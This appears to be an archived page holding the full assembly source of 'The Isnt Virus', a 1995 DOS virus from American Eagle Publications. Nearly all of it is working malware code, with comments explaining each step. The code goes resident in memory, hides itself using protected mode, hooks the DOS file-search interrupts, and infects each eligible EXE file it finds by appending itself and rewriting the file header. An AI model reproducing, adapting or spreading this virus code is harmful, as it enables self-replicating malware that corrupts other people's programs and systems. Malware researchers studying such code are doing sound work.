home *** CD-ROM | disk | FTP | other *** search
- ;The Isnt Virus.
- ;(C) 1995 American Eagle Publications, Inc. All rights reserved.
-
- ;This is a resident virus which infects files when they are searched for
- ;using the FCB-based search functions. It is a protected mode virus which
- ;stealths its existence in memory.
-
- .SEQ ;segments must appear in sequential order
- ;to simulate conditions in actual active virus
-
- .386P ;protected mode 386 code
-
- ;HOSTSEG program code segment. The virus gains control before this routine and
- ;attaches itself to another EXE file.
- HOSTSEG SEGMENT BYTE USE16
- ASSUME CS:HOSTSEG,SS:HSTACK
-
- ;This host simply terminates and returns control to DOS.
- HOST:
- db 15000 dup (90H) ;make host larger than virus
- mov ax,4C00H
- int 21H ;terminate normally
- HOSTSEG ENDS
-
- ;Host program stack segment
- STACKSIZE EQU 100H ;size of stack for this program
-
- HSTACK SEGMENT PARA USE16 STACK 'STACK'
- db STACKSIZE dup (0)
- HSTACK ENDS
-
- ;************************************************************************
- ;This is the virus itself
-
- ;Intruder Virus code segment. This gains control first, before the host. As this
- ;ASM file is layed out, this program will look exactly like a simple program
- ;that was infected by the virus.
-
- VSEG SEGMENT PARA USE16
- ASSUME CS:VSEG,DS:VSEG,SS:HSTACK
-
- ;******************************************************************************
- ;This is the data area for the virus which goes resident when the virus goes
- ;resident. It contains data needed by the resident part, and data which the
- ;startup code needs pre-initialized.
-
- PAGES EQU 2 ;number of pages virus takes
-
- OLD_21H DD ? ;old int 21H vector
-
- ;The following is the control block for the DOS EXEC function. It is used by
- ;the virus to execute the host program after it installs itself in memory.
- EXEC_BLK DW 0 ;seg @ of environment string
- DW 80H,0 ;4 byte ptr to command line
- DW 5CH,0 ;4 byte ptr to first FCB
- DW 6CH,0 ;4 byte ptr to second FCB
-
- FNAME DB 12 dup (0)
- FSIZE DW 0,0
- EXE_HDR DB 1CH dup (?) ;buffer for EXE file header
- PSP DW ? ;place to store PSP segment
- T1SEG DW 0 ;flag to indicate first generation
- PARAS DW 0 ;paragraphs before virus start
-
- ;The following 10 bytes must stay together because they are an image of 10
- ;bytes from the EXE header
- HOSTS DW 0,STACKSIZE ;host stack and code segments
- FILLER DW ? ;these are dynamically set by the virus
- HOSTC DW OFFSET HOST,0 ;but hard-coded in the 1st generation
-
- ;******************************************************************************
- ;This portion of the virus goes resident if it isn't already. In theory,
- ;because of the stealthing, this code should never get control unless the
- ;virus is not resident. Thus, it never has to check to see if it's already
- ;there!
- ISNT:
- mov ax,4209H ;see if virus is already there
- int 21H
- jnc JMP_HOST ;yes, just go execute host
- call IS_V86 ;are we in V86 mode already?
- jz NOT_RESIDENT ;no, go ahead and load
- JMP_HOST: ;else just execute host
- mov ax,cs ;relocate relocatables
- add WORD PTR cs:[HOSTS],ax
- add WORD PTR cs:[HOSTC+2],ax
- cli ;set up host stack
- mov ss,WORD PTR cs:[HOSTS]
- mov sp,WORD PTR cs:[HOSTS+2]
- sti
- jmp DWORD PTR cs:[HOSTC] ;and transfer control to the host
-
- NOT_RESIDENT:
- mov ax,ds ;move virus down
- add ax,10H ;first figure out where
- mov bx,ax
- and ax,0FF00H ;set ax=page boundary
- add ax,100H ;go up to next bdy
- mov es,ax ;es=page bdy
- mov bx,ds
- sub ax,bx ;ax=paragraphs from PSP to virus
- mov cs:[PARAS],ax ;save it here
- push cs ;first, let's move host to page:0
- pop ds ;note that the host must be larger
- xor si,si ;than the virus for this to work
- mov di,0
- mov cx,OFFSET END_STACK
- add cx,OFFSET END_TASK1 + 20H
- rep movsb ;move it
- mov ax,es
- push ax ;now jump to PAGE:GO_RESIDENT
- mov ax,OFFSET MOVED_DOWN
- push ax
- retf ;using a retf
-
- MOVED_DOWN:
- push ds
- push cs
- pop ds ;ds=cs
- call INSTALL_INTS ;install interrupt handlers
- cmp WORD PTR [T1SEG],0 ;first generation?
- pop cx
- jne GO_EXEC ;no, go exec host
- mov ax,SEG TASK1
- sub ax,cx
- mov WORD PTR [T1SEG],ax ;else reset flag
- jmp SHORT GO_RESIDENT ;and go resident
-
- GO_EXEC:
- cli
- mov ax,cs
- mov ss,ax
- mov sp,OFFSET END_STACK ;move stack down
- sti
- mov ah,62H
- int 21H ;get PSP
- mov es,bx
- mov bx,PAGES*256 ;prep to reduce memory size
- add bx,[PARAS] ;bx=pages to save
- mov ah,4AH
- int 21H ;reduce it
-
- mov bx,2CH ;get environment segment
- mov es,es:[bx]
- mov ax,ds
- sub ax,[PARAS]
- mov WORD PTR [EXEC_BLK],es ;set up EXEC data structure
- mov [EXEC_BLK+4],ax ;for EXEC function to execute host
- mov [EXEC_BLK+8],ax
- mov [EXEC_BLK+12],ax
-
- xor di,di ;now get host's name from
- mov cx,7FFFH ;environment
- xor al,al
- HNLP: repnz scasb
- scasb
- loopnz HNLP
- add di,2 ;es:di point to host's name now
-
- push es ;now prepare to EXEC the host
- pop ds
- mov dx,di ;ds:dx point to host's name now
- push cs
- pop es
- mov bx,OFFSET EXEC_BLK ;es:bx point to EXEC_BLK
- mov ax,4B00H
- int 21H ;now EXEC the host
-
- push ds
- pop es ;es=segment of host EXECed
- mov ah,49H ;free memory from EXEC
- int 21H
- mov ah,4DH ;get host return code
- int 21H
- push cs
- pop ds
- push cs
- pop es
-
- GO_RESIDENT:
- push ds
- mov ax,cs
- add ax,[T1SEG]
- mov ds,ax
- ASSUME DS:TASK1
- mov WORD PTR [NEW_21H],OFFSET SRCH_HOOK
- mov WORD PTR [NEW_21H+2],cs
- mov WORD PTR [SEG_FAULT],cs
- pop ds
- ASSUME DS:VSEG
- call REMOVE_INTS ;remove int hook prior to going prot
- call GO_PROTECTED ;go to protected mode if possible
- push cs
- pop ds
- mov dx,PAGES*256
- add dx,[PARAS]
- mov ax,3100H ;return with host's return code
-
- pushf ;return @ for simulated int 21H
- push cs
- push OFFSET GR2 + 2
-
- pushf ;@ to iret to (Int 21 ISR)
- mov ax,WORD PTR [OLD_21H+2]
- push ax
- mov ax,WORD PTR [OLD_21H]
- push ax
- mov ax,3100H
- GR2: int 0FFH
-
-
- ;INSTALL_INTS installs the interrupt 21H hook so that the virus becomes
- ;active. All this does is put the existing INT 21H vector in OLD_21H and
- ;put the address of INT_21H into the vector.
- INSTALL_INTS:
- push es ;preserve es!
- mov ax,3521H ;hook interrupt 21H
- int 21H
- mov WORD PTR [OLD_21H],bx ;save old here
- mov WORD PTR [OLD_21H+2],es
- mov dx,OFFSET INT_21H ;and set up new
- mov ax,2521H
- int 21H
- IIRET: pop es
- ret
-
- ;This removes the interrupt 21H hook installed by INSTALL_INTS.
- REMOVE_INTS:
- lds dx,[OLD_21H]
- mov ax,2521H
- int 21H
- ret
-
- ;This is the interrupt 21H hook. It becomes active when installed by
- ;INSTALL_INTS. It traps Functions 11H and 12H and infects all EXE files
- ;found by those functions.
- INT_21H:
- cmp ax,4209H ;self-test for virus?
- jne GOLD
- clc ;yes, clear carry and exit
- retf 2
- GOLD: jmp DWORD PTR cs:[OLD_21H] ;execute original int 21 handler
-
-
- ;This routine just calls the old Interrupt 21H vector internally. It is
- ;used to help get rid of tons of pushf/call DWORD PTR's in the code
- DOS:
- pushf
- call DWORD PTR cs:[OLD_21H]
- ret
-
- ;This is the Search First/Search Next Function Hook, hooking the FCB-based
- ;functions
- SRCH_HOOK:
- call DOS ;call original handler
- or al,al ;was it successful?
- jnz SEXIT ;nope, just exit
- pushf
- pusha ;save registers
- push es
- push ds
-
- mov ah,2FH ;get dta address in es:bx
- int 21H
- cmp BYTE PTR es:[bx],0FFH
- jne SH1 ;an extended fcb?
- add bx,7 ;yes, adjust index
- SH1: call FILE_OK ;ok to infect?
- jc EXIT_SRCH ;no, see if already infected, and stealth
- call INFECT_FILE ;go ahead and infect it
- EXIT_SRCH:
- pop ds ;restore registers
- pop es
- popa
- popf
- SEXIT: int 0FFH ;protected mode return
-
-
- ;Function to determine whether the file found by the search routine is
- ;useable. If so return nc, else return c.
- ;What makes a file useable?:
- ; a) It must have an extension of EXE.
- ; b) The file date must be earlier than 2037.
- ; c) The signature field in the EXE header must be 'MZ'. (These
- ; are the first two bytes in the file.)
- ; d) The Overlay Number field in the EXE header must be zero.
- ; e) It should be a DOS EXE, without a new header.
- ; f) The host must be larger than the virus.
-
- FILE_OK:
- push es
- pop ds
- cmp WORD PTR [bx+9],'XE'
- jne OK_EX ;check for an EXE file
- cmp BYTE PTR [bx+11],'E'
- jne OK_EX ;if not EXE, just return control to caller
- jmp OK_GOON
- OK_EX: jmp OK_END2
-
- OK_GOON:mov si,bx ;ds:si now points to fcb
- inc si ;now, to file name in fcb
- push cs
- pop es
- mov di,OFFSET FNAME ;es:di points to file name buffer here
- mov cx,8 ;number of bytes in file name
- FO1: lodsb ;let's get the file name
- stosb
- cmp al,20H
- je FO2
- loop FO1
- inc di
- FO2: mov BYTE PTR es:[di-1],'.' ;put it in ASCIIZ format
- mov ax,'XE' ;with no spaces
- stosw ;so we can use handle-based routines
- mov ax,'E' ;to check it further
- stosw
-
- push cs
- pop ds ;now cs, ds and es all point here
- mov dx,OFFSET FNAME
- mov ax,3D02H ;r/w access open file using handle
- int 21H
- jc OK_END1 ;error opening - C set - quit without closing
- mov bx,ax ;put handle into bx and leave bx alone from here on out
-
- mov cx,1CH ;read 28 byte EXE file header
- mov dx,OFFSET EXE_HDR ;into this buffer
- mov ah,3FH ;for examination and modification
- call DOS
- jc OK_END ;error in reading the file, so quit
- cmp WORD PTR [EXE_HDR],'ZM';check EXE signature of MZ
- jnz OK_END ;close & exit if not
- cmp WORD PTR [EXE_HDR+26],0;check overlay number
- jnz OK_END ;not 0 - exit with c set
- cmp WORD PTR [EXE_HDR+24],40H ;is rel table at offset 40H or more?
- jnc OK_END ;yes, it is not a DOS EXE, so skip it
- cmp WORD PTR [EXE_HDR+14H],OFFSET ISNT ;startup = ISNT?
- je OK_END ;yes, probably already infected
- mov ax,WORD PTR [EXE_HDR+4];get page count
- dec ax
- mov cx,512
- mul cx
- add ax,WORD PTR [EXE_HDR+2]
- adc dx,0 ;dx:ax contains file size
- or dx,dx ;if dx>0
- jz OK_END3 ;then the file is big enough
- mov dx,OFFSET END_TASK1 + 20H
- add dx,OFFSET END_STACK
- add dx,1000H ;add 4K to handle page variability
- cmp ax,dx ;check size
- jc OK_END ;not big enough, exit
- OK_END3:clc ;no, all clear, clear carry
- jmp SHORT OK_END1 ;and leave file open
- OK_END: mov ah,3EH ;else close the file
- int 21H
- OK_END2:stc ;set carry to indicate file not ok
- OK_END1:ret ;return with c flag set properly
-
- ;This routine moves the virus (this program) to the end of the EXE file
- ;Basically, it just copies everything here to there, and then goes and
- ;adjusts the EXE file header. It also makes sure the virus starts
- ;on a paragraph boundary, and adds how many bytes are necessary to do that.
- INFECT_FILE:
- mov ax,4202H ;seek end of file to determine size
- xor cx,cx
- xor dx,dx
- int 21H
- mov cx,dx ;move to regs for Function 42H
- mov dx,ax
- or dl,0FH ;adjust file length to paragraph
- add dx,1 ;boundary
- adc cx,0
- mov WORD PTR [FSIZE+2],cx
- mov WORD PTR [FSIZE],dx
- mov ax,4200H ;set file pointer, relative to beginning
- int 21H ;go to end of file + boundary
-
- mov cx,OFFSET END_STACK ;last byte of code
- add cx,OFFSET END_TASK1+10H
- xor dx,dx ;first byte of code, ds:dx
- mov ah,40H ;write body of virus to file
- int 21H
-
- INF1: mov dx,WORD PTR [FSIZE] ;find relocatables in code
- mov cx,WORD PTR [FSIZE+2] ;original end of file
- add dx,OFFSET HOSTS ; + offset of HOSTS
- adc cx,0 ;cx:dx is that number
- mov ax,4200H ;set file pointer to 1st relocatable
- int 21H
-
- mov ax,WORD PTR [FSIZE] ;calculate viral initial CS
- mov dx,WORD PTR [FSIZE+2] ; = File size / 16 - Header Size(Para)
- mov cx,16
- div cx ;dx:ax contains file size / 16
- sub ax,WORD PTR [EXE_HDR+8] ;subtract exe header size, in paragraphs
- push ax
- sub WORD PTR [EXE_HDR+14],ax ;adjust initial cs and ss
- sub WORD PTR [EXE_HDR+22],ax ;to work with relocation scheme
-
- mov dx,OFFSET EXE_HDR+14 ;get correct host ss:sp, cs:ip
- mov cx,10
- mov ah,40H ;and write it to HOSTS/HOSTC
- int 21H
-
- xor cx,cx ;so now adjust the EXE header values
- xor dx,dx
- mov ax,4200H ;set file pointer to start of file
- int 21H
-
- pop ax
- mov WORD PTR [EXE_HDR+22],ax;save as initial CS
- mov WORD PTR [EXE_HDR+14],ax;save as initial SS
- mov WORD PTR [EXE_HDR+20],OFFSET ISNT ;save initial ip
- mov WORD PTR [EXE_HDR+16],OFFSET END_VIRUS + STACKSIZE ;save initial sp
-
- mov dx,WORD PTR [FSIZE+2] ;calculate new file size for header
- mov ax,WORD PTR [FSIZE] ;get original size
- add ax,OFFSET END_VIRUS + 200H ;add virus size + 1 paragraph, 512 bytes
- adc dx,0
- add ax,OFFSET END_TASK1 + 10H
- adc dx,0
- mov cx,200H ;divide by paragraph size
- div cx ;ax=paragraphs, dx=last paragraph size
- mov WORD PTR [EXE_HDR+4],ax ;and save paragraphs here
- mov WORD PTR [EXE_HDR+2],dx ;last paragraph size here
- mov cx,1CH ;and save 1CH bytes of header
- mov dx,OFFSET EXE_HDR ;at start of file
- mov ah,40H
- int 21H
-
- mov ah,3EH ;close file now
- int 21H
- ret ;that's it, infection is complete!
-
- INCLUDE PROTECT.ASM
-
- END_VIRUS: ;marker for end of resident part
-
- ;******************************************************************************
- ;This is a temporary local stack for the virus used by it when EXECing the
- ;host program. It reduces its memory size as much as possible to give the
- ;host room to EXEC. However, it must maintain a stack, so here it is. This
- ;part of the virus is not kept when it goes resident.
-
- LOCAL_STK DB 256 dup (0) ;local stack for virus
-
- END_STACK:
-
- VSEG ENDS
-
- INCLUDE TASK1.ASM
-
- END ISNT
-